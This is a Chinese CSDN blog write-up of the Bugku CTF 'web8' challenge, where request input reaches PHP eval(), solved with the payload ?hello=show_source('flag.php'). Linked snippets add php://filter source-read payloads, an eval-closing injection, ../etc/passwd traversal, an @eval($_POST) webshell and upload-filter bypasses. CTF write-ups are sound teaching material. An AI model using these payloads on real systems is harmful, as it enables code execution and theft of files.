Bugku web8 文件包含

最新推荐文章于 2024-07-30 14:59:55 发布
最新推荐文章于 2024-07-30 14:59:55 发布
阅读量565 收藏 2
点赞数 3
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44522540/article/details/113930923
版权
本文探讨了PHP中`eval()`函数和`include`语句的使用,重点讲解了如何利用`flag.php`文件包含漏洞,并通过构造URL进行攻击。讲解了`var_dump`的作用,以及`show_source`的用法。
摘要由CSDN通过智能技术生成

九、web8 文件包含

<?php
    include "flag.php"; //flag在flag.php里
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

    0x01知识点

  • $_REQUEST[]支持det、post两种方式发送过来的请求,很明显接收了hello参数的值
  • var_dump()函数 显示关于一个或多个表达式的结构信息,包括表达式的类型与值;数组将递归展开值,通过缩进显示其结构
  • eval()函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。
  • show_source() 函数对文件进行语法高亮显示,是 highlight_file() 的别名

构造url:?hello=show_source(‘flag.php’)
在这里插入图片描述
flag是too young too simple(当然不是)手动滑稽

hana-u
关注
专栏目录
BugKu_文件包含
Kobalos的博客
08-06 353
直接访问目标地址 发现有一个跳转链接,点击尝试,发现跳转到/index.php?file=show.php 看他的url还有题目名字,确定这里应该就是文件包含的漏洞点了 CTF中经常使用的是php://filter和php://input php://filter 用于读取源码 php://input 用于执行php代码 php://filter/read=convert.base64-encode/resource=[文件名] 用于读取文件.
Bugku web——文件包含2
qq_40481505的博客
10-16 955
打开链接,看到链接形式为file=hello.php,因此首先尝试php文件包含 php://filter/read=convert.base64-encode/resource/hello.php 报错 php://input 报错 file://var/www/hello.php 没有报错,但也没有输出 data: text/plain,<?php echo 123; ?> ...
Bugku CTF-web8 文件包含
weixin_44023403的博客
04-22 480
Bugku CTF-web8 文件包含前言解题 前言 文件包含概述: 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 包含: 我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含。 有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。 PH
BUGKU-WEB-文件包含
最新发布
m0_52484587的博客
07-30 715
convert.base64-encode:是一个过滤器,看到encode可以知道这是一个加密的过滤,那自然就有convert.base64-decode,解密了。可以看到,说是这个参数可以不选,在PHP伪协议中,read是一个用于读取文件内容的操作符。如果不进行 base64 编码传入,index.php 就会直接执行,我们就看不到文件中的内容了。这样做的好处就是如果不进行编码,文件包含后就不会有输出结果,而是当做php文件执行了,而通过编码后则可以读取文件源码。read操作符将返回指定长度的文件内容。
web8:文件包含(了解eval函数以及php文件操作)
y17861077326的博客
02-02 689
文件包含,根据题目以及代码的意思可知,这个题目与php文件有关系。 flag应该就在flag.php文件中,又可知,eval函数是执行字符串的,var_dump是显示变量内容和结构的。 有两种解法: 闭合var_dump:http://114.67.246.176:19411/?hello=1);print_r(file(%22flag.php%22),利用漏洞,修改了eval的参数的内容。变为了 eval(“var_dump(1);print_r(file(‘flag.php’));”) eval将.
bugku web 8 (文件包含)wp
yanfangjie的博客
02-25 269
bugku web 8(文件包含) writeup <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> $_REQUEST[ ] 默认情况下包含了GET、_GET、G​ET、_POST、$_COOKIE的数组; 1、$_REQUEST可以接收_GET、POST、POST、_COOKIE发送的数据; 2
bugku 文件包含
m0_63711447的博客
04-28 209
1、打开题目环境之后,点击链接进入该页面 2、使用php:filter协议查看源文件内容 (php:filter是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取。通常使用该协议来读取或者写入部分数据,且在读取和写入之前对数据进行一些过滤,例如进行base64编码处理,rot13处理等。) 名称 描述 备注 resource=<要过滤的数据流> 指定了你要筛选过滤的数据流 必选 read=<读链的筛选列表>
Bugku Web CTF-文件包含2
No Title
12-31 460
Bugku Web CTF-文件包含2 打开是一个页面,题目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
bugkuctf解题-WEB
05-04
常见的攻击方式包括SQL注入、XSS(跨站脚本攻击)、CSRF(跨站请求伪造)、文件包含漏洞、命令注入等。对于这些攻击,我们需要了解它们的工作原理和防御措施。 1. SQL注入:当用户输入的数据未经有效过滤或转义就...
bugku-writeup-web-文件包含
热门推荐
dark的博客
06-14 1万+
bugku-web13解题思路记录。” 题目:click me? no
BugkuCTF-WEB题文件上传
am_03的博客
09-08 1930
启动场景 发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个: 一个是http head里的Content-Type: multipart/form-data; 请求头部的 Content-Type 内容 随便改个大写字母过滤掉 比如 mulTipart/form-data (其t为大写) Multipart里的部分字母
Bugku文件包含
金 帛的博客
02-15 809
BugkuWP
bugku文件包含
qq_62046696的博客
04-30 1000
因为时文件包含的题目,首先尝试一下file=index.php,发现出现了报错信息。然后考虑用伪协议绕过一下 1.file=php://input仍然出现了报错信息,然后用一下其他的伪协议 2.file=php://filter/read=convert.base64-encode/resource=./index.php 得到base64加密的编码,通过base64解码就可以获取flag ...
Bugku-文件包含
qq_56611811的博客
05-16 247
得到flag{f285b417425153e41a60b28032c76395}file=show.php。试试能不能回到上级目录。
Bugku 文件包含
qq_52718293的博客
10-23 140
这题提示了是文件包含,利用php为协议读取文件就好,然后百度一下(推荐这个文),然后选用这个 http://127.0.0.1/cmd.php?cmd=php://filter/read=convert.base64-encode/resource=[文件名](针对php文件需要base64编码) 然后拿到base64一下 ok了 ...
bugku——文件包含
m0_46607055的博客
10-29 262
文件包含 配合 伪协议 读取敏感文件! 文件包含 配合 伪协议 读取敏感文件! 文件包含 配合 伪协议 读取敏感文件! 做了那么多文件包含的题目,还是会忘掉这个知识点。该打小手! 解题过程 访问IP。默认是index.php 点击click me? no 、传参 file = show.php 尝试查看index.php 的源码。发现不可以。 这时候用伪协议绕过 ?file=php://filter/read/convert.base64-encode/resource=ind...
bugku--文件包含
qq_51802152的博客
12-14 521
bugku--文件包含
bugku文件包含2
09-25
文件包含是指通过一个文件传入参数(构造语句)去访问另一个文件,从而获取想要的内容。在bugku中,文件包含的方法主要有两种。 首先,可以通过上传文件并抓包的方式来实现文件包含。通过修改参数content-type为image/jpeg filename="1.php:.jpg",可以获取到文件路径。 然后,访问返回的路径,可以看到一串字符,其中包含了一个.txt文件。通过修改参数file=.txt,即可获取到Flag。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值